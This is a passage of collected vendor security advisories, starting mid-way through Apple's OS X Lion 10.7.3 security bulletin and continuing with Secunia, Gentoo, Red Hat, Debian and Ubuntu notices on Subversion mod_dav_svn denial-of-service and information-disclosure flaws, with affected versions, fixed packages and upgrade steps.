Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,
OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2
Impact: Viewing a maliciously crafted JPEG2000 image file may lead
to an unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in the handling of JPEG2000
files.
CVE-ID
CVE-2011-3250 : Luigi Auriemma working with TippingPoint's Zero Day
Initiative
QuickTime
Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,
OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2
Impact: Processing a maliciously crafted PNG image may lead to an
unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in the handling of PNG files.
CVE-ID
CVE-2011-3460 : Luigi Auriemma working with TippingPoint's Zero Day
Initiative
QuickTime
Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,
OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2
Impact: Viewing a maliciously crafted movie file may lead to an
unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in the handling of FLC
encoded movie files.
CVE-ID
CVE-2011-3249 : Matt 'j00ru' Jurczyk working with TippingPoint's Zero
Day Initiative
SquirrelMail
Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8
Impact: Multiple vulnerabilities in SquirrelMail
Description: SquirrelMail is updated to version 1.4.22 to address
several vulnerabilities, the most serious of which is a cross-site
scripting issue. This issue does not affect OS X Lion systems.
Further information is available via the SquirrelMail web site at
http://www.SquirrelMail.org/
CVE-ID
CVE-2010-1637
CVE-2010-2813
CVE-2010-4554
CVE-2010-4555
CVE-2011-2023
Subversion
Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,
OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2
Impact: Accessing a Subversion repository may lead to the disclosure
of sensitive information
Description: Subversion is updated to version 1.6.17 to address
multiple vulnerabilities, the most serious of which may lead to the
disclosure of sensitive information. Further information is available
via the Subversion web site at http://subversion.tigris.org/
CVE-ID
CVE-2011-1752
CVE-2011-1783
CVE-2011-1921
Time Machine
Available for: OS X Lion v10.7 to v10.7.2,
OS X Lion Server v10.7 to v10.7.2
Impact: A remote attacker may access new backups created by the
user's system
Description: The user may designate a remote AFP volume or Time
Capsule to be used for Time Machine backups. Time Machine did not
verify that the same device was being used for subsequent backup
operations. An attacker who is able to spoof the remote volume could
gain access to new backups created by the user's system. This issue
is addressed by verifying the unique identifier associated with a
disk for backup operations.
CVE-ID
CVE-2011-3462 : Michael Roitzsch of the Technische Universität
Dresden
Tomcat
Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8
Impact: Multiple vulnerabilities in Tomcat 6.0.32
Description: Tomcat is updated to version 6.0.33 to address multiple
vulnerabilities, the most serious of which may lead to the disclosure
of sensitive information. Tomcat is only provided on Mac OS X Server
systems. This issue does not affect OS X Lion systems. Further
information is available via the Tomcat site at
http://tomcat.apache.org/
CVE-ID
CVE-2011-2204
WebDAV Sharing
Available for: OS X Lion Server v10.7 to v10.7.2
Impact: Local users may obtain system privileges
Description: An issue existed in WebDAV Sharing's handling of user
authentication. A user with a valid account on the server or one of
its bound directories could cause the execution of arbitrary code
with system privileges. This issue does not affect systems prior to
OS X Lion.
CVE-ID
CVE-2011-3463 : Gordon Davisson of Crywolf
Webmail
Available for: OS X Lion v10.7 to v10.7.2,
OS X Lion Server v10.7 to v10.7.2
Impact: Viewing a maliciously crafted e-mail message may lead to the
disclosure of message content
Description: A cross-site scripting vulnerability existed in the
handling of mail messages. This issue is addressed by updating
Roundcube Webmail to version 0.6. This issue does not affect systems
prior to OS X Lion. Further information is available via the
Roundcube site at http://trac.roundcube.net/
CVE-ID
CVE-2011-2937
X11
Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,
OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2
Impact: Viewing a maliciously crafted PDF file may lead to an
unexpected application termination or arbitrary code execution
Description: A memory corruption issue existed in FreeType's
handling of Type 1 fonts. This issue is addressed by updating
FreeType to version 2.4.7. Further information is available via the
FreeType site at http://www.freetype.org/
CVE-ID
CVE-2011-3256 : Apple
OS X Lion v10.7.3 and Security Update 2012-001 may be obtained from
the Software Update pane in System Preferences, or Apple's Software
Downloads web site:
http://www.apple.com/support/downloads/
The Software Update utility will present the update that applies
to your system configuration. Only one is needed, either
Security Update 2012-001 or OS X v10.7.3.
For OS X Lion v10.7.2
The download file is named: MacOSXUpd10.7.3.dmg
Its SHA-1 digest is: 7102fe8f9f47286c45dfa35f6e84e7f730493a7c
For OS X Lion v10.7 and v10.7.1
The download file is named: MacOSXUpdCombo10.7.3.dmg
Its SHA-1 digest is: 07dfce300f6801eb63d9ac13e0bec84e1862a16c
For OS X Lion Server v10.7.2
The download file is named: MacOSXServerUpd10.7.3.dmg
Its SHA-1 digest is: 55a9571635d4ec088c142d68132d0d69fcb8867d
For OS X Lion Server v10.7 and v10.7.1
The download file is named: MacOSXServerUpdCombo10.7.3.dmg
Its SHA-1 digest is: 2c87824f09734499ea166ea0617a3ac21ecf832b
For Mac OS X v10.6.8
The download file is named: SecUpd2012-001Snow.dmg
Its SHA-1 digest is: 40875ee8cb609bbaefc8f421a9c34cc353db42b8
For Mac OS X Server v10.6.8
The download file is named: SecUpdSrvr2012-001.dmg
Its SHA-1 digest is: 53b3ca5548001a9920aeabed4a034c6e4657fe20
Information will also be posted to the Apple Security Updates
web site: http://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
----------------------------------------------------------------------
TITLE:
Apache Subversion mod_dav_svn Two Denial of Service Vulnerabilities
SECUNIA ADVISORY ID:
SA44681
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/44681/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=44681
RELEASE DATE:
2011-06-02
DISCUSS ADVISORY:
http://secunia.com/advisories/44681/#comments
DESCRIPTION:
Two vulnerabilities have been reported in Apache Subversion, which
can be exploited by malicious people to cause a DoS (Denial of
Service).
This vulnerability is reported in versions 1.6.16 and prior.
This vulnerability is reported in versions 1.5.0 through 1.6.16.
PROVIDED AND/OR DISCOVERED BY:
1) Reported by the vendor
2) The vendor credits Ivan Zhakov, VisualSVN.
ORIGINAL ADVISORY:
http://subversion.apache.org/security/CVE-2011-1752-advisory.txt
http://subversion.apache.org/security/CVE-2011-1783-advisory.txt
http://subversion.apache.org/security/CVE-2011-1921-advisory.txt
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 201309-11
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Low
Title: Subversion: Multiple vulnerabilities
Date: September 23, 2013
Bugs: #350166, #356741, #369065, #463728, #463860, #472202, #482166
ID: 201309-11
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Multiple vulnerabilities have been found in Subversion, allowing
attackers to cause a Denial of Service, escalate privileges, or obtain
sensitive information.
Background
==========
Subversion is a versioning system designed to be a replacement for CVS.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 dev-vcs/subversion < 1.7.13 >= 1.7.13
Description
===========
Multiple vulnerabilities have been discovered in Subversion. Please
review the CVE identifiers referenced below for details.
Impact
======
A remote attacker could cause a Denial of Service condition or obtain
sensitive information. A local attacker could escalate his privileges
to the user running svnserve.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Subversion users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=dev-vcs/subversion-1.7.13"
References
==========
[ 1 ] CVE-2010-4539
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4539
[ 2 ] CVE-2010-4644
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4644
[ 3 ] CVE-2011-0715
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0715
[ 4 ] CVE-2011-1752
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1752
[ 5 ] CVE-2011-1783
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1783
[ 6 ] CVE-2011-1921
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1921
[ 7 ] CVE-2013-1845
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1845
[ 8 ] CVE-2013-1846
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1846
[ 9 ] CVE-2013-1847
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1847
[ 10 ] CVE-2013-1849
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1849
[ 11 ] CVE-2013-1884
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1884
[ 12 ] CVE-2013-1968
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1968
[ 13 ] CVE-2013-2088
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2088
[ 14 ] CVE-2013-2112
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2112
[ 15 ] CVE-2013-4131
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4131
[ 16 ] CVE-2013-4277
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4277
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201309-11.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2013 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
=====================================================================
Red Hat Security Advisory
Synopsis: Moderate: subversion security update
Advisory ID: RHSA-2011:0862-01
Product: Red Hat Enterprise Linux
Advisory URL: https://rhn.redhat.com/errata/RHSA-2011-0862.html
Issue date: 2011-06-08
CVE Names: CVE-2011-1752 CVE-2011-1783 CVE-2011-1921
=====================================================================
1. Summary:
Updated subversion packages that fix three security issues are now
available for Red Hat Enterprise Linux 5 and 6.
The Red Hat Security Response Team has rated this update as having moderate
security impact. Common Vulnerability Scoring System (CVSS) base scores,
which give detailed severity ratings, are available for each vulnerability
from the CVE links in the References section.
2. Relevant releases/architectures:
RHEL Desktop Workstation (v. 5 client) - i386, x86_64
Red Hat Enterprise Linux (v. 5 server) - i386, ia64, ppc, s390x, x86_64
Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, noarch, x86_64
Red Hat Enterprise Linux HPC Node Optional (v. 6) - noarch, x86_64
Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64
Red Hat Enterprise Linux Server Optional (v. 6) - i386, noarch, ppc64, s390x, x86_64
Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, noarch, x86_64
3. Description:
Subversion (SVN) is a concurrent version control system which enables one
or more users to collaborate in developing and maintaining a hierarchy of
files and directories while keeping a history of all changes. The
mod_dav_svn module is used with the Apache HTTP Server to allow access to
Subversion repositories via HTTP.
An infinite loop flaw was found in the way the mod_dav_svn module processed
certain data sets. If the SVNPathAuthz directive was set to
"short_circuit", and path-based access control for files and directories
was enabled, a malicious, remote user could use this flaw to cause the
httpd process serving the request to consume an excessive amount of system
memory. (CVE-2011-1783)
A NULL pointer dereference flaw was found in the way the mod_dav_svn module
processed requests submitted against the URL of a baselined resource. A
malicious, remote user could use this flaw to cause the httpd process
serving the request to crash. (CVE-2011-1752)
An information disclosure flaw was found in the way the mod_dav_svn
module processed certain URLs when path-based access control for files and
directories was enabled. A malicious, remote user could possibly use this
flaw to access certain files in a repository that would otherwise not be
accessible to them. Note: This vulnerability cannot be triggered if the
SVNPathAuthz directive is set to "short_circuit". (CVE-2011-1921)
Red Hat would like to thank the Apache Subversion project for reporting
these issues. Upstream acknowledges Joe Schaefer of the Apache Software
Foundation as the original reporter of CVE-2011-1752; Ivan Zhakov of
VisualSVN as the original reporter of CVE-2011-1783; and Kamesh
Jayachandran of CollabNet, Inc. as the original reporter of CVE-2011-1921.
All Subversion users should upgrade to these updated packages, which
contain backported patches to correct these issues. After installing the
updated packages, you must restart the httpd daemon, if you are using
mod_dav_svn, for the update to take effect.
4. Solution:
Before applying this update, make sure all previously-released errata
relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to
use the Red Hat Network to apply this update are available at
https://access.redhat.com/kb/docs/DOC-11259
5. Bugs fixed (http://bugzilla.redhat.com/):
709111 - CVE-2011-1752 subversion (mod_dav_svn): DoS (crash) via request to deliver baselined WebDAV resources
709112 - CVE-2011-1783 subversion (mod_dav_svn): DoS (excessive memory use) when configured to provide path-based access control
709114 - CVE-2011-1921 subversion (mod_dav_svn): File contents disclosure of files configured to be unreadable by those users
6. Package List:
RHEL Desktop Workstation (v. 5 client):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Client/en/os/SRPMS/subversion-1.6.11-7.el5_6.4.src.rpm
i386:
mod_dav_svn-1.6.11-7.el5_6.4.i386.rpm
subversion-1.6.11-7.el5_6.4.i386.rpm
subversion-debuginfo-1.6.11-7.el5_6.4.i386.rpm
subversion-devel-1.6.11-7.el5_6.4.i386.rpm
subversion-javahl-1.6.11-7.el5_6.4.i386.rpm
subversion-perl-1.6.11-7.el5_6.4.i386.rpm
subversion-ruby-1.6.11-7.el5_6.4.i386.rpm
x86_64:
mod_dav_svn-1.6.11-7.el5_6.4.x86_64.rpm
subversion-1.6.11-7.el5_6.4.i386.rpm
subversion-1.6.11-7.el5_6.4.x86_64.rpm
subversion-debuginfo-1.6.11-7.el5_6.4.i386.rpm
subversion-debuginfo-1.6.11-7.el5_6.4.x86_64.rpm
subversion-devel-1.6.11-7.el5_6.4.i386.rpm
subversion-devel-1.6.11-7.el5_6.4.x86_64.rpm
subversion-javahl-1.6.11-7.el5_6.4.x86_64.rpm
subversion-perl-1.6.11-7.el5_6.4.x86_64.rpm
subversion-ruby-1.6.11-7.el5_6.4.x86_64.rpm
Red Hat Enterprise Linux (v. 5 server):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Server/en/os/SRPMS/subversion-1.6.11-7.el5_6.4.src.rpm
i386:
mod_dav_svn-1.6.11-7.el5_6.4.i386.rpm
subversion-1.6.11-7.el5_6.4.i386.rpm
subversion-debuginfo-1.6.11-7.el5_6.4.i386.rpm
subversion-devel-1.6.11-7.el5_6.4.i386.rpm
subversion-javahl-1.6.11-7.el5_6.4.i386.rpm
subversion-perl-1.6.11-7.el5_6.4.i386.rpm
subversion-ruby-1.6.11-7.el5_6.4.i386.rpm
ia64:
mod_dav_svn-1.6.11-7.el5_6.4.ia64.rpm
subversion-1.6.11-7.el5_6.4.ia64.rpm
subversion-debuginfo-1.6.11-7.el5_6.4.ia64.rpm
subversion-devel-1.6.11-7.el5_6.4.ia64.rpm
subversion-javahl-1.6.11-7.el5_6.4.ia64.rpm
subversion-perl-1.6.11-7.el5_6.4.ia64.rpm
subversion-ruby-1.6.11-7.el5_6.4.ia64.rpm
ppc:
mod_dav_svn-1.6.11-7.el5_6.4.ppc.rpm
subversion-1.6.11-7.el5_6.4.ppc.rpm
subversion-1.6.11-7.el5_6.4.ppc64.rpm
subversion-debuginfo-1.6.11-7.el5_6.4.ppc.rpm
subversion-debuginfo-1.6.11-7.el5_6.4.ppc64.rpm
subversion-devel-1.6.11-7.el5_6.4.ppc.rpm
subversion-devel-1.6.11-7.el5_6.4.ppc64.rpm
subversion-javahl-1.6.11-7.el5_6.4.ppc.rpm
subversion-perl-1.6.11-7.el5_6.4.ppc.rpm
subversion-ruby-1.6.11-7.el5_6.4.ppc.rpm
s390x:
mod_dav_svn-1.6.11-7.el5_6.4.s390x.rpm
subversion-1.6.11-7.el5_6.4.s390.rpm
subversion-1.6.11-7.el5_6.4.s390x.rpm
subversion-debuginfo-1.6.11-7.el5_6.4.s390.rpm
subversion-debuginfo-1.6.11-7.el5_6.4.s390x.rpm
subversion-devel-1.6.11-7.el5_6.4.s390.rpm
subversion-devel-1.6.11-7.el5_6.4.s390x.rpm
subversion-javahl-1.6.11-7.el5_6.4.s390x.rpm
subversion-perl-1.6.11-7.el5_6.4.s390x.rpm
subversion-ruby-1.6.11-7.el5_6.4.s390x.rpm
x86_64:
mod_dav_svn-1.6.11-7.el5_6.4.x86_64.rpm
subversion-1.6.11-7.el5_6.4.i386.rpm
subversion-1.6.11-7.el5_6.4.x86_64.rpm
subversion-debuginfo-1.6.11-7.el5_6.4.i386.rpm
subversion-debuginfo-1.6.11-7.el5_6.4.x86_64.rpm
subversion-devel-1.6.11-7.el5_6.4.i386.rpm
subversion-devel-1.6.11-7.el5_6.4.x86_64.rpm
subversion-javahl-1.6.11-7.el5_6.4.x86_64.rpm
subversion-perl-1.6.11-7.el5_6.4.x86_64.rpm
subversion-ruby-1.6.11-7.el5_6.4.x86_64.rpm
Red Hat Enterprise Linux Desktop Optional (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/subversion-1.6.11-2.el6_1.4.src.rpm
i386:
mod_dav_svn-1.6.11-2.el6_1.4.i686.rpm
subversion-1.6.11-2.el6_1.4.i686.rpm
subversion-debuginfo-1.6.11-2.el6_1.4.i686.rpm
subversion-devel-1.6.11-2.el6_1.4.i686.rpm
subversion-gnome-1.6.11-2.el6_1.4.i686.rpm
subversion-javahl-1.6.11-2.el6_1.4.i686.rpm
subversion-kde-1.6.11-2.el6_1.4.i686.rpm
subversion-perl-1.6.11-2.el6_1.4.i686.rpm
subversion-ruby-1.6.11-2.el6_1.4.i686.rpm
noarch:
subversion-svn2cl-1.6.11-2.el6_1.4.noarch.rpm
x86_64:
mod_dav_svn-1.6.11-2.el6_1.4.x86_64.rpm
subversion-1.6.11-2.el6_1.4.i686.rpm
subversion-1.6.11-2.el6_1.4.x86_64.rpm
subversion-debuginfo-1.6.11-2.el6_1.4.i686.rpm
subversion-debuginfo-1.6.11-2.el6_1.4.x86_64.rpm
subversion-devel-1.6.11-2.el6_1.4.i686.rpm
subversion-devel-1.6.11-2.el6_1.4.x86_64.rpm
subversion-gnome-1.6.11-2.el6_1.4.i686.rpm
subversion-gnome-1.6.11-2.el6_1.4.x86_64.rpm
subversion-javahl-1.6.11-2.el6_1.4.i686.rpm
subversion-javahl-1.6.11-2.el6_1.4.x86_64.rpm
subversion-kde-1.6.11-2.el6_1.4.i686.rpm
subversion-kde-1.6.11-2.el6_1.4.x86_64.rpm
subversion-perl-1.6.11-2.el6_1.4.i686.rpm
subversion-perl-1.6.11-2.el6_1.4.x86_64.rpm
subversion-ruby-1.6.11-2.el6_1.4.i686.rpm
subversion-ruby-1.6.11-2.el6_1.4.x86_64.rpm
Red Hat Enterprise Linux HPC Node Optional (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/subversion-1.6.11-2.el6_1.4.src.rpm
noarch:
subversion-svn2cl-1.6.11-2.el6_1.4.noarch.rpm
x86_64:
mod_dav_svn-1.6.11-2.el6_1.4.x86_64.rpm
subversion-1.6.11-2.el6_1.4.i686.rpm
subversion-1.6.11-2.el6_1.4.x86_64.rpm
subversion-debuginfo-1.6.11-2.el6_1.4.i686.rpm
subversion-debuginfo-1.6.11-2.el6_1.4.x86_64.rpm
subversion-devel-1.6.11-2.el6_1.4.i686.rpm
subversion-devel-1.6.11-2.el6_1.4.x86_64.rpm
subversion-gnome-1.6.11-2.el6_1.4.i686.rpm
subversion-gnome-1.6.11-2.el6_1.4.x86_64.rpm
subversion-javahl-1.6.11-2.el6_1.4.i686.rpm
subversion-javahl-1.6.11-2.el6_1.4.x86_64.rpm
subversion-kde-1.6.11-2.el6_1.4.i686.rpm
subversion-kde-1.6.11-2.el6_1.4.x86_64.rpm
subversion-perl-1.6.11-2.el6_1.4.i686.rpm
subversion-perl-1.6.11-2.el6_1.4.x86_64.rpm
subversion-ruby-1.6.11-2.el6_1.4.i686.rpm
subversion-ruby-1.6.11-2.el6_1.4.x86_64.rpm
Red Hat Enterprise Linux Server (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/subversion-1.6.11-2.el6_1.4.src.rpm
i386:
mod_dav_svn-1.6.11-2.el6_1.4.i686.rpm
subversion-1.6.11-2.el6_1.4.i686.rpm
subversion-debuginfo-1.6.11-2.el6_1.4.i686.rpm
subversion-javahl-1.6.11-2.el6_1.4.i686.rpm
ppc64:
mod_dav_svn-1.6.11-2.el6_1.4.ppc64.rpm
subversion-1.6.11-2.el6_1.4.ppc.rpm
subversion-1.6.11-2.el6_1.4.ppc64.rpm
subversion-debuginfo-1.6.11-2.el6_1.4.ppc.rpm
subversion-debuginfo-1.6.11-2.el6_1.4.ppc64.rpm
s390x:
mod_dav_svn-1.6.11-2.el6_1.4.s390x.rpm
subversion-1.6.11-2.el6_1.4.s390.rpm
subversion-1.6.11-2.el6_1.4.s390x.rpm
subversion-debuginfo-1.6.11-2.el6_1.4.s390.rpm
subversion-debuginfo-1.6.11-2.el6_1.4.s390x.rpm
x86_64:
mod_dav_svn-1.6.11-2.el6_1.4.x86_64.rpm
subversion-1.6.11-2.el6_1.4.i686.rpm
subversion-1.6.11-2.el6_1.4.x86_64.rpm
subversion-debuginfo-1.6.11-2.el6_1.4.i686.rpm
subversion-debuginfo-1.6.11-2.el6_1.4.x86_64.rpm
subversion-javahl-1.6.11-2.el6_1.4.i686.rpm
subversion-javahl-1.6.11-2.el6_1.4.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/subversion-1.6.11-2.el6_1.4.src.rpm
i386:
subversion-debuginfo-1.6.11-2.el6_1.4.i686.rpm
subversion-devel-1.6.11-2.el6_1.4.i686.rpm
subversion-gnome-1.6.11-2.el6_1.4.i686.rpm
subversion-kde-1.6.11-2.el6_1.4.i686.rpm
subversion-perl-1.6.11-2.el6_1.4.i686.rpm
subversion-ruby-1.6.11-2.el6_1.4.i686.rpm
noarch:
subversion-svn2cl-1.6.11-2.el6_1.4.noarch.rpm
ppc64:
subversion-debuginfo-1.6.11-2.el6_1.4.ppc.rpm
subversion-debuginfo-1.6.11-2.el6_1.4.ppc64.rpm
subversion-devel-1.6.11-2.el6_1.4.ppc.rpm
subversion-devel-1.6.11-2.el6_1.4.ppc64.rpm
subversion-gnome-1.6.11-2.el6_1.4.ppc.rpm
subversion-gnome-1.6.11-2.el6_1.4.ppc64.rpm
subversion-javahl-1.6.11-2.el6_1.4.ppc.rpm
subversion-javahl-1.6.11-2.el6_1.4.ppc64.rpm
subversion-kde-1.6.11-2.el6_1.4.ppc.rpm
subversion-kde-1.6.11-2.el6_1.4.ppc64.rpm
subversion-perl-1.6.11-2.el6_1.4.ppc.rpm
subversion-perl-1.6.11-2.el6_1.4.ppc64.rpm
subversion-ruby-1.6.11-2.el6_1.4.ppc.rpm
subversion-ruby-1.6.11-2.el6_1.4.ppc64.rpm
s390x:
subversion-debuginfo-1.6.11-2.el6_1.4.s390.rpm
subversion-debuginfo-1.6.11-2.el6_1.4.s390x.rpm
subversion-devel-1.6.11-2.el6_1.4.s390.rpm
subversion-devel-1.6.11-2.el6_1.4.s390x.rpm
subversion-gnome-1.6.11-2.el6_1.4.s390.rpm
subversion-gnome-1.6.11-2.el6_1.4.s390x.rpm
subversion-javahl-1.6.11-2.el6_1.4.s390.rpm
subversion-javahl-1.6.11-2.el6_1.4.s390x.rpm
subversion-kde-1.6.11-2.el6_1.4.s390.rpm
subversion-kde-1.6.11-2.el6_1.4.s390x.rpm
subversion-perl-1.6.11-2.el6_1.4.s390.rpm
subversion-perl-1.6.11-2.el6_1.4.s390x.rpm
subversion-ruby-1.6.11-2.el6_1.4.s390.rpm
subversion-ruby-1.6.11-2.el6_1.4.s390x.rpm
x86_64:
subversion-debuginfo-1.6.11-2.el6_1.4.i686.rpm
subversion-debuginfo-1.6.11-2.el6_1.4.x86_64.rpm
subversion-devel-1.6.11-2.el6_1.4.i686.rpm
subversion-devel-1.6.11-2.el6_1.4.x86_64.rpm
subversion-gnome-1.6.11-2.el6_1.4.i686.rpm
subversion-gnome-1.6.11-2.el6_1.4.x86_64.rpm
subversion-kde-1.6.11-2.el6_1.4.i686.rpm
subversion-kde-1.6.11-2.el6_1.4.x86_64.rpm
subversion-perl-1.6.11-2.el6_1.4.i686.rpm
subversion-perl-1.6.11-2.el6_1.4.x86_64.rpm
subversion-ruby-1.6.11-2.el6_1.4.i686.rpm
subversion-ruby-1.6.11-2.el6_1.4.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/subversion-1.6.11-2.el6_1.4.src.rpm
i386:
mod_dav_svn-1.6.11-2.el6_1.4.i686.rpm
subversion-1.6.11-2.el6_1.4.i686.rpm
subversion-debuginfo-1.6.11-2.el6_1.4.i686.rpm
subversion-javahl-1.6.11-2.el6_1.4.i686.rpm
x86_64:
mod_dav_svn-1.6.11-2.el6_1.4.x86_64.rpm
subversion-1.6.11-2.el6_1.4.i686.rpm
subversion-1.6.11-2.el6_1.4.x86_64.rpm
subversion-debuginfo-1.6.11-2.el6_1.4.i686.rpm
subversion-debuginfo-1.6.11-2.el6_1.4.x86_64.rpm
subversion-javahl-1.6.11-2.el6_1.4.i686.rpm
subversion-javahl-1.6.11-2.el6_1.4.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/subversion-1.6.11-2.el6_1.4.src.rpm
i386:
subversion-debuginfo-1.6.11-2.el6_1.4.i686.rpm
subversion-devel-1.6.11-2.el6_1.4.i686.rpm
subversion-gnome-1.6.11-2.el6_1.4.i686.rpm
subversion-kde-1.6.11-2.el6_1.4.i686.rpm
subversion-perl-1.6.11-2.el6_1.4.i686.rpm
subversion-ruby-1.6.11-2.el6_1.4.i686.rpm
noarch:
subversion-svn2cl-1.6.11-2.el6_1.4.noarch.rpm
x86_64:
subversion-debuginfo-1.6.11-2.el6_1.4.i686.rpm
subversion-debuginfo-1.6.11-2.el6_1.4.x86_64.rpm
subversion-devel-1.6.11-2.el6_1.4.i686.rpm
subversion-devel-1.6.11-2.el6_1.4.x86_64.rpm
subversion-gnome-1.6.11-2.el6_1.4.i686.rpm
subversion-gnome-1.6.11-2.el6_1.4.x86_64.rpm
subversion-kde-1.6.11-2.el6_1.4.i686.rpm
subversion-kde-1.6.11-2.el6_1.4.x86_64.rpm
subversion-perl-1.6.11-2.el6_1.4.i686.rpm
subversion-perl-1.6.11-2.el6_1.4.x86_64.rpm
subversion-ruby-1.6.11-2.el6_1.4.i686.rpm
subversion-ruby-1.6.11-2.el6_1.4.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/#package
7. References:
https://www.redhat.com/security/data/cve/CVE-2011-1752.html
https://www.redhat.com/security/data/cve/CVE-2011-1783.html
https://www.redhat.com/security/data/cve/CVE-2011-1921.html
https://access.redhat.com/security/updates/classification/#moderate
http://subversion.apache.org/security/CVE-2011-1783-advisory.txt
http://subversion.apache.org/security/CVE-2011-1752-advisory.txt
http://subversion.apache.org/security/CVE-2011-1921-advisory.txt
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2011 Red Hat, Inc.
The Common Vulnerabilities and Exposures project
identifies the following problems:
CVE-2011-1752
The mod_dav_svn Apache HTTPD server module can be crashed when asked
to deliver baselined WebDAV resources.
For the oldstable distribution (lenny), this problem has been fixed in
version 1.5.1dfsg1-7.
For the stable distribution (squeeze), this problem has been fixed in
version 1.6.12dfsg-6.
For the unstable distribution (sid), this problem has been fixed in
version 1.6.17dfsg-1.
==========================================================================
Ubuntu Security Notice USN-1144-1
June 06, 2011
subversion vulnerabilities
==========================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 11.04
- Ubuntu 10.10
- Ubuntu 10.04 LTS
Summary:
An attacker could send crafted input to the Subversion mod_dav_svn module
for Apache and cause it to crash or gain access to restricted files.
Software Description:
- subversion: Advanced version control system
Details:
Joe Schaefer discovered that the Subversion mod_dav_svn module for Apache
did not properly handle certain baselined WebDAV resource requests. (CVE-2011-1752)
Ivan Zhakov discovered that the Subversion mod_dav_svn module for Apache
did not properly handle certain requests. (CVE-2011-1921)
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 11.04:
libapache2-svn 1.6.12dfsg-4ubuntu2.1
Ubuntu 10.10:
libapache2-svn 1.6.12dfsg-1ubuntu1.3
Ubuntu 10.04 LTS:
libapache2-svn 1.6.6dfsg-2ubuntu1.3
After a standard system update you need to restart any applications that
use Subversion, such as Apache when using mod_dav_svn, to make all the
necessary changes.
VAR-201106-0131 | CVE-2011-1752 | Apache Subversion mod_dav_svn module for Apache HTTP Server denial of service (DoS) vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
